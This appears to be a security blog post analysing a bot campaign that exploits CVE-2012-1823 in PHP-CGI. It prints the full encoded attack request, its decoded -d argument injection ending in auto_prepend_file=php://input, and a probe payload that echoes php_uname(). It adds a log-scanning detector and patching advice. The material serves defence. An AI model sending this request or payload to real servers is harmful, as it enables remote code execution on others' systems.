Bot Network Scanners Activated

While analysing our logs we noticed an ongoing automated attack against PHP installations that exploits a vulnerability in PHP itself.

The attacker is trying to exploit CVE-2012-1823. This only applies if PHP runs in CGI mode (php-cgi); mod_php is not vulnerable to it.


POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

Decoding the URL gives:

/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n

The request injects -d parameters into the command line of the PHP CGI binary. This works because the CGI specification makes the web server pass a query string that contains no unencoded "=" to the script as command-line arguments, which is why every "=" in the request is sent as %3D. With those -d overrides the attacker switches off whatever protection mechanisms your PHP has in place (safe_mode, disable_functions, open_basedir, Suhosin) and then executes PHP code directly through auto_prepend_file, which makes PHP run the given file before processing any requested script. Here that file is php://input, the stream of the POST request body, so the attacker's code arrives in the POST data; allow_url_include=on is needed so that php://input is accepted as an include target. The trailing -n tells PHP to ignore php.ini altogether.
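To make the mechanism concrete, here is an added example (not tooling from this post's author) that rebuilds the argv a CGI gateway would derive from the raw query string and flags log lines that carry this kind of argument injection. The log lines in SAMPLE_LOG are constructed; only the first request target is the one captured above. The -s probe in the third line is the source-disclosure variant of the same bug, included as an assumption about what else such scanners send.

```python
"""Detect CVE-2012-1823-style argument injection against PHP-CGI in access logs.

Added example for this post, not tooling from the original author. The log
lines in SAMPLE_LOG are constructed; only the first request target is the one
captured in the post.
"""
import re
from urllib.parse import unquote

# php.ini directives an attacker wants to override with -d before running code.
INTERESTING_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "auto_append_file",
    "disable_functions", "open_basedir", "safe_mode", "suhosin.simulation",
}

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed Apache combined-format lines: one copy of the captured attack,
# one ordinary request, and a -s source-disclosure probe (assumed) from the
# same bug.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2012:03:14:15 +0000] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 512 "-" "-"
198.51.100.4 - - [10/May/2012:03:14:16 +0000] "GET /index.php?page=1&id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2012:03:14:17 +0000] "GET /index.php?-s HTTP/1.1" 200 4096 "-" "curl/7.21.0"
"""


def cgi_argv(raw_query):
    """Rebuild the argv a CGI gateway derives from the *raw* query string.

    RFC 3875 section 4.4: only a query string with no unencoded '=' is turned
    into command-line arguments (split on '+', each piece URL-decoded). The
    captured attack satisfies this because every '=' is sent as %3D.
    """
    if not raw_query or "=" in raw_query:
        return []
    return [unquote(piece) for piece in raw_query.split("+") if piece]


def analyze_target(target):
    """Return a finding dict for a request target, or None if it is harmless."""
    raw_path, _, raw_query = target.partition("?")
    argv = cgi_argv(raw_query)
    if not argv or not argv[0].startswith("-"):
        return None  # nothing reaches php-cgi as an option

    # Collect every "-d name=value" pair the attacker injected.
    settings = {}
    for i, arg in enumerate(argv):
        if arg == "-d" and i + 1 < len(argv):
            name, _, value = argv[i + 1].partition("=")
            settings[name] = value

    if settings.get("auto_prepend_file") == "php://input" or settings.get("allow_url_include") == "on":
        verdict = "remote code execution attempt"
    elif "-s" in argv:
        verdict = "source disclosure probe"
    else:
        verdict = "argument injection"

    return {
        "path": unquote(raw_path),
        "argv": argv,
        "settings": settings,
        "overridden": sorted(d for d in settings if d in INTERESTING_DIRECTIVES),
        "verdict": verdict,
    }


def scan_log(text):
    """Run analyze_target over every request line; return findings in log order."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = analyze_target(m.group("target"))
        if finding:
            finding["method"] = m.group("method")
            finding["client"] = line.split(" ", 1)[0]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['method']} {f['path']}: {f['verdict']}; "
              f"php.ini overrides: {', '.join(f['overridden']) or 'none'}")
```

The important detail is that the check runs on the raw, still-encoded query string: a request that carries a literal "=" is never turned into arguments, so decoding first and then looking for "-d" would produce false positives on ordinary requests.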

POST content :

<?php echo "Content-Type:text/html\r\n\r\n";echo "bun4".php_uname()."st0p";exit; ?>

At the moment this payload is not harmful by itself; it only tests whether the server is vulnerable. The markers bun4 and st0p around the php_uname() output let the scanner recognise a successful hit in the response. Once a vulnerable host is found, the same channel can deliver any PHP code the attacker likes.

If you are running a vulnerable version of PHP, update it as soon as possible. Also check the Server API line in the output of phpinfo() as served by your web server: if it does not mention CGI, you are safe from this particular attack for the moment, but running an obsolete PHP version is never a good idea.